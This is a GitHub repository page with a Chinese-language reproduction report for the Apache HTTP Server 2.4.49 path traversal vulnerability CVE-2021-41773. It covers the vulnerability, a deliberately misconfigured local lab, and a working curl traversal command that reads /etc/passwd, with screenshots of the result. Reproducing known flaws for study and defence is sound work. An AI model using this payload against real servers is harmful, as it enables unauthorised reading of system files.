fxdyx-a/CVE-2021-41773-POC

GitHub: fxdyx-a/CVE-2021-41773-POC

该项目复现了 Apache HTTP Server 2.4.49 的路径遍历漏洞（CVE-2021-41773），提供从环境搭建到攻击验证的完整流程。

Stars: 0 | Forks: 0

# CVE-2021-41773 漏洞复现报告 ## 漏洞概述 - **CVE ID**: CVE-2021-41773 - **漏洞名称**: Apache HTTP Server 路径遍历漏洞 - **风险等级**: 高危 (CVSS 7.5) - **影响版本**: Apache HTTP Server 2.4.49 - **漏洞描述**: Apache HTTP Server 2.4.49 版本存在路径规范化函数 `ap_normalize_path` 的实现缺陷，攻击者可通过构造含有 `%2e` 编码的特殊请求绕过访问控制，读取 Web 服务器上的任意文件。 ## 环境搭建 - **操作系统**: Ubuntu 20.04 (虚拟机) - **Web服务器**: Apache httpd 2.4.49 (手动编译安装) - **靶场环境**: 独立运行，监听端口 8080 - **关键配置**: - 修改 `` 的 `Require all denied` 为 `Require all granted` - 添加 Alias `/vuln` 指向 `/tmp/vuln_dir` 并设置权限 ## 漏洞复现 ### 攻击命令 curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' ### 攻击截图 ![读取 /etc/passwd 成功](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/61670a13bf122008.png) ![读取 /etc/passwd 成功](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/88483d53e0122017.png)

标签：Apache HTTP Server, CISA项目, Web安全, 应用安全, 漏洞复现, 蓝队分析, 路径遍历, 靶场环境